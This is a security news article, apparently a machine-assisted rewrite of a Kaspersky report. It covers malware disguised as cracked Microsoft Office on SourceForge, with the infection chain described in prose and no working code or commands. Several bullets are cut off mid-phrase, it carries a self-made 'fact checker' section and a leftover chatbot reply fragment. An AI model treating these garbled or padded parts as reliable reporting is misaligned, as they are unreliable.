Cybercriminals Use SourceForge to Distribute Malware Disguised as Cracked Microsoft Office

By /

Listen to this Post

A recent investigation by Kaspersky has unveiled a cyberattack campaign where hackers are abusing SourceForge, a legitimate software hosting platform, to deliver malicious software disguised as cracked versions of Microsoft Office. This tactic is part of a broader trend where attackers exploit trusted platforms and manipulate search results to spread malware to unsuspecting users.

This article breaks down the key points of the campaign, how it works, and the larger implications for cybersecurity in 2025.

Malware Campaign Summary (Approx. )

  • Threat actors are leveraging SourceForge to host fake Microsoft Office software packages.
  • One such project, named officepackage, appears to offer harmless Office add-ins but actually delivers malware.
  • The site mimics legitimate downloads using domain names like officepackage.sourceforge.io and deceptive URLs.
  • Users clicking the download button are redirected to taplink.cc, where they’re served a ZIP file (vinstaller.zip).
  • The ZIP file contains a password-protected archive and a text file revealing the password.
  • Inside the second archive is an MSI installer that deploys a Visual Basic script.
  • The script triggers a chain of PowerShell scripts, which:

– Download a batch file from GitHub

– Extract malicious files

– Send metadata via Telegram API

– The malware includes:

– Cryptocurrency miner

– Clipper malware (ClipBanker)

– Netcat (ShellExperienceHost.exe) for encrypted remote access

  • An additional script, ErrorHandler.cmd, is designed to fetch and run further code via Telegram.
  • This campaign primarily targets Russian-speaking users, with 90% of infections in Russia.
  • Over 4,600 users encountered the campaign between January and March.
  • Attackers exploit search engines like Yandex to lure users searching for cracked Office downloads.

– Besides this, Kaspersky uncovered other attacks, including:

  • Malware hosted on fake DeepSeek AI chatbot websites.
  • Fake sites promoted via Google ads pushing a downloader named TookPS.
  • DLL sideloading tricks using TeamViewer to create stealthy remote access backdoors.
  • A related malvertising campaign delivers ThunderShell (aka SMOKEDHAM), a PowerShell-based remote access tool.
  • ThunderShell is a post-exploitation framework used by red teams—but in this case, abused by real attackers.

What Undercode Say: Deep Analysis & Insights (Approx. 40 Lines)

This attack represents a convergence of social engineering, platform abuse, and code obfuscation, all executed with surprising finesse. Here’s how it breaks down from a threat research and cybersecurity operations perspective:

  • Abusing Trustworthy Platforms: SourceForge has long been a go-to destination for open-source software. That trust is now weaponized. Unlike phishing or shady download sites, attackers here exploit a legitimate brand, increasing the chance of user compliance.

  • Layered Obfuscation: The multi-stage process—ZIP inside ZIP, VB scripts, PowerShell payloads—demonstrates a deliberate effort to evade antivirus and behavioral detection. The use of password-protected archives thwarts automated scanning.

– Command-and-Control Evolution: Leveraging

  • Strategic Language Targeting: The focus on Russian-language content and the use of Yandex search indexing show a precise regional targeting mechanism. It’s not a scattershot phishing attack—it’s a sniper-level operation.

  • Double-Dipping in Monetization: The inclusion of both cryptominers and clippers suggests that attackers are extracting immediate financial value, while netcat and TeviRat hint at long-term exploitation potential—like reselling access or data.

– Sponsored Malvertising:

  • DLL Sideloading Abuse: This technique, especially when paired with legitimate tools like TeamViewer, allows for stealth remote access that is hard to detect and even harder to remove once entrenched. It blurs the line between system processes and malware activity.

  • GitHub as a Payload Source: Hosting malicious batch files and scripts on GitHub adds another trusted domain into the attack chain. This undermines network filtering efforts, as GitHub traffic is often whitelisted.

  • Cybercrime as a Service (CaaS): The sophistication suggests either a well-funded group or the use of plug-and-play malware kits sold on the dark web. The ability to stitch together clipper malware, RATs, and miners into a seamless install process is not amateur work.

  • Implications for Enterprise: Organizations relying on SourceForge or open-source resources need to validate binaries rigorously. Supply chain attacks don’t always come through developers—sometimes the danger lies in what employees download on their own.

  • Next-Gen Threat Detection: Behavioral monitoring and network-level anomaly detection are critical. Static AV or signature-based detection would likely miss this due to the level of obfuscation and script-layer detonation.

  • Telegram, GitHub, SourceForge – a deadly trio: The use of legitimate infrastructure across all three makes attribution difficult and takedown coordination slow.

  • What’s Next? Expect a rise in localized malware campaigns that mirror this structure. Language targeting, region-specific search results, and trust-abuse are proving more effective than traditional phishing.

Fact Checker Results:

  • ✅ SourceForge is confirmed as the initial malware host in this campaign.
  • ✅ Malware variants include cryptominers, clippers, and PowerShell-based RATs.
  • ✅ The campaign mainly targeted Russian users via Yandex-indexed pages.

you’d like this formatted for publication, turned into a PDF, or SEO-optimized further with metadata and keyword headers.

References:

Reported By: thehackernews.com
Extra Source Hub:
https://www.discord.com
Wikipedia
Undercode AI

Image Source:

Pexels
Undercode AI DI v2

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Explore More: